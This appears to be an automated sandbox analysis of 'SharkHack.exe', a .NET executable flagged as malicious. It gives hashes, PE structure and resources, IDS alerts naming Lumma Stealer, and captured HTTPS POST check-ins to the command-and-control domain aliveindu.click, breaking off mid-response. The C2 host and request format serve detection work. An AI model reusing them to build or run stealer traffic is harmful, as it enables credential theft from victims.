                                                                                                        SHA-512:D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
                                                                                                        Malicious:true
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.309365550243163
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                        File name:SharkHack.exe
                                                                                                        File size:7'181'824 bytes
                                                                                                        MD5:af8f4b24943a56c36283c58af92a66d2
                                                                                                        SHA1:97d2342d59a890a5c1645efeb275e3ad4f061f78
                                                                                                        SHA256:35bfacbefd16ff1a1b942c068a3509ab21b08b830b30ebf659fe83a6d6c8817c
                                                                                                        SHA512:a48e5f7dd95e74dfa85c4d2672f32c55160e659666a6370afb0d05dfb51a899459c127a8e53af1736cc230c0fdc2b48d2c04ce0a8c53e922c0c749972aa07c2a
                                                                                                        SSDEEP:98304:hzjqYyXE93kfPo9/f0VO/ATX49tpaw0evffz9Ura1pUN5GrqDfTndUbf+W7:J0XECf2sVJInrfz8a1ItDfTdUbf+W7
                                                                                                        TLSH:8D76331567C24054F97F5B74887930441239BCA2BCBACF7E69DB622CCD319629B39723
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......L.................8k..\.......Wk.. ........@.. ........................m...........`................................

                                                                                                        File Icon

                                                                                                        Icon Hash:0e0fcdce6c3b0f8c

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0xab57be
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x4CA20790 [Tue Sep 28 15:19:44 2010 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6b57700x4b.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6b60000x25944.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6dc0000xc.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x20000x6b37c40x6b3800a05707858d4d4d39c0497ba0bd0a78ddunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x6b60000x259440x25a00bd969c7530b9d4ce630e9d3c7bd98813False0.23192223837209303data5.366841848822205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x6dc0000xc0x2009a8678fcd8678a73e3e9ef755eb593d0False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_CURSOR0x6b6ef40x134Targa image data 64 x 65536 x 1 +32 "\001"0.3961038961038961
                                                                                                        RT_CURSOR0x6b70280x134Targa image data 64 x 65536 x 1 +32 "\001"0.31493506493506496
                                                                                                        RT_CURSOR0x6b715c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                        RT_CURSOR0x6b72900x134data0.4642857142857143
                                                                                                        RT_CURSOR0x6b73c40x134data0.4805194805194805
                                                                                                        RT_CURSOR0x6b74f80x134data0.38311688311688313
                                                                                                        RT_CURSOR0x6b762c0x134data0.36038961038961037
                                                                                                        RT_CURSOR0x6b77600x134data0.4090909090909091
                                                                                                        RT_CURSOR0x6b78940x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                        RT_BITMAP0x6b79c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                        RT_BITMAP0x6b7b980x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                        RT_BITMAP0x6b7d7c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                        RT_BITMAP0x6b7f4c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                        RT_BITMAP0x6b811c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                        RT_BITMAP0x6b82ec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                        RT_BITMAP0x6b84bc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                        RT_BITMAP0x6b868c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                        RT_BITMAP0x6b885c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                        RT_BITMAP0x6b8a2c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                        RT_BITMAP0x6b8bfc0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                        RT_ICON0x6b8ce40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.296028880866426
                                                                                                        RT_ICON0x6b958c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.24210339524429197
                                                                                                        RT_DIALOG0x6c9db40x52data0.7682926829268293
                                                                                                        RT_STRING0x6c9e080x224data0.4835766423357664
                                                                                                        RT_STRING0x6ca02c0x1d8data0.510593220338983
                                                                                                        RT_STRING0x6ca2040x2cdata0.5227272727272727
                                                                                                        RT_STRING0x6ca2300x230data0.475
                                                                                                        RT_STRING0x6ca4600x398data0.43043478260869567
                                                                                                        RT_STRING0x6ca7f80x420data0.38636363636363635
                                                                                                        RT_STRING0x6cac180x458data0.4064748201438849
                                                                                                        RT_STRING0x6cb0700x348data0.4035714285714286
                                                                                                        RT_STRING0x6cb3b80x3c0data0.3416666666666667
                                                                                                        RT_STRING0x6cb7780x274data0.4538216560509554
                                                                                                        RT_STRING0x6cb9ec0x61cdata0.3414322250639386
                                                                                                        RT_STRING0x6cc0080x230data0.42142857142857143
                                                                                                        RT_STRING0x6cc2380x1f4data0.444
                                                                                                        RT_STRING0x6cc42c0x100data0.56640625
                                                                                                        RT_STRING0x6cc52c0x5f4data0.3615485564304462
                                                                                                        RT_STRING0x6ccb200x100data0.56640625
                                                                                                        RT_STRING0x6ccc200x12cdata0.5633333333333334
                                                                                                        RT_STRING0x6ccd4c0x19cdata0.5194174757281553
                                                                                                        RT_STRING0x6ccee80x658data0.3368226600985222
                                                                                                        RT_STRING0x6cd5400x49cdata0.3652542372881356
                                                                                                        RT_STRING0x6cd9dc0x514data0.3830769230769231
                                                                                                        RT_STRING0x6cdef00x59cdata0.3565459610027855
                                                                                                        RT_STRING0x6ce48c0x198data0.44607843137254904
                                                                                                        RT_STRING0x6ce6240xe4data0.5657894736842105
                                                                                                        RT_STRING0x6ce7080x264data0.49019607843137253
                                                                                                        RT_STRING0x6ce96c0x4e0data0.31971153846153844
                                                                                                        RT_STRING0x6cee4c0x368data0.44036697247706424
                                                                                                        RT_STRING0x6cf1b40x340data0.4014423076923077
                                                                                                        RT_RCDATA0x6cf4f40x10data1.5
                                                                                                        RT_RCDATA0x6cf5040x990data0.5441176470588235
                                                                                                        RT_RCDATA0x6cfe940x1fe2Delphi compiled form 'TForm1'0.43616760597892673
                                                                                                        RT_RCDATA0x6d1e780x37cDelphi compiled form 'TForm14'0.5627802690582959
                                                                                                        RT_RCDATA0x6d21f40x4d6Delphi compiled form 'TForm2'0.48384491114701134
                                                                                                        RT_RCDATA0x6d26cc0x919cDelphi compiled form 'TInfoForm'0.10057409593304002
                                                                                                        RT_GROUP_CURSOR0x6db8680x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                        RT_GROUP_CURSOR0x6db87c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                        RT_GROUP_CURSOR0x6db8900x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                        RT_GROUP_CURSOR0x6db8a40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                        RT_GROUP_CURSOR0x6db8b80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                        RT_GROUP_CURSOR0x6db8cc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                        RT_GROUP_CURSOR0x6db8e00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                        RT_GROUP_CURSOR0x6db8f40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                        RT_GROUP_CURSOR0x6db9080x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                        RT_GROUP_ICON0x6db91c0x14data1.25
                                                                                                        RT_GROUP_ICON0x6db9300x14data1.25

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        mscoree.dll_CorExeMain

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-30T18:47:00.926245+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450013104.21.64.143443TCP
                                                                                                        2024-12-30T18:47:01.412207+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450013104.21.64.143443TCP
                                                                                                        2024-12-30T18:47:01.412207+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450013104.21.64.143443TCP
                                                                                                        2024-12-30T18:47:02.071916+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450014104.21.64.143443TCP
                                                                                                        2024-12-30T18:47:02.547746+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450014104.21.64.143443TCP
                                                                                                        2024-12-30T18:47:02.547746+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450014104.21.64.143443TCP
                                                                                                        2024-12-30T18:47:03.207695+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450015104.21.64.143443TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 30, 2024 18:47:00.450478077 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:00.450499058 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:00.454814911 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:00.457487106 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:00.457495928 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:00.926131010 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:00.926244974 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:00.927896023 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:00.927901983 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:00.928124905 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:00.971282005 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:00.971282005 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:00.971405029 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:01.412210941 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:01.412309885 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:01.412444115 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:01.418636084 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:01.418637037 CET50013443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:01.418673038 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:01.418698072 CET44350013104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:01.445398092 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:01.445429087 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:01.445507050 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:01.445836067 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:01.445849895 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.071842909 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.071916103 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.073854923 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.073865891 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.074112892 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.075711966 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.075743914 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.075788975 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.547751904 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.547797918 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.547825098 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.547858000 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.547864914 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.547878981 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.547889948 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.547897100 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.547960997 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.548109055 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.548425913 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.548453093 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.548495054 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.548510075 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.548556089 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.552361012 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.552470922 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.552495956 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.552525997 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.552536964 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.554822922 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.635982990 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.636061907 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.636122942 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.636149883 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.636171103 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.636224985 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.637018919 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.637034893 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.637048960 CET50014443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.637057066 CET44350014104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.737618923 CET50015443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.737713099 CET44350015104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:02.737845898 CET50015443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.738073111 CET50015443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:02.738097906 CET44350015104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:03.207617044 CET44350015104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:03.207695007 CET50015443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:03.209152937 CET50015443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:03.209161043 CET44350015104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:03.209372044 CET44350015104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:03.210596085 CET50015443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:03.210741997 CET50015443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:03.210762024 CET44350015104.21.64.143192.168.2.4
                                                                                                        Dec 30, 2024 18:47:03.210824966 CET50015443192.168.2.4104.21.64.143
                                                                                                        Dec 30, 2024 18:47:03.210835934 CET44350015104.21.64.143192.168.2.4

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 30, 2024 18:47:00.434233904 CET6188953192.168.2.41.1.1.1
                                                                                                        Dec 30, 2024 18:47:00.445626974 CET53618891.1.1.1192.168.2.4

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 30, 2024 18:47:00.434233904 CET192.168.2.41.1.1.10x59abStandard query (0)aliveindu.clickA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 30, 2024 18:47:00.445626974 CET1.1.1.1192.168.2.40x59abNo error (0)aliveindu.click104.21.64.143A (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 18:47:00.445626974 CET1.1.1.1192.168.2.40x59abNo error (0)aliveindu.click172.67.151.146A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • aliveindu.click

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.450013104.21.64.1434437012C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 17:47:00 UTC262OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 8
                                                                                                        Host: aliveindu.click
                                                                                                        2024-12-30 17:47:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                        Data Ascii: act=life
                                                                                                        2024-12-30 17:47:01 UTC1127INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 30 Dec 2024 17:47:01 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=5ggenpqli3n298j1h6rl4b0hd4; expires=Fri, 25 Apr 2025 11:33:40 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIpLydApfNnB73d9H9UJL01m6Bq5CO2%2F4Ttvu%2BNcIjs9RqHh8sCVs08UTxXMwISu7abCKeKMUrXjFsilkJGA9B%2FVXF2ImMvyItlBXYf%2BD%2B2He77Juuyf0EhjXSLbgQ6QEuA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fa3da436b2e0f8b-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1698&rtt_var=646&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1680092&cwnd=237&unsent_bytes=0&cid=06d9361084184489&ts=496&x=0"
                                                                                                        2024-12-30 17:47:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        2024-12-30 17:47:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.450014104.21.64.1434437012C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 17:47:02 UTC263OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 46
                                                                                                        Host: aliveindu.click
                                                                                                        2024-12-30 17:47:02 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 46 63 47 68 36 2d 2d 32 39 31 32 26 6a 3d
                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=bFcGh6--2912&j=
                                                                                                        2024-12-30 17:47:02 UTC1128INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 30 Dec 2024 17:47:02 GMT
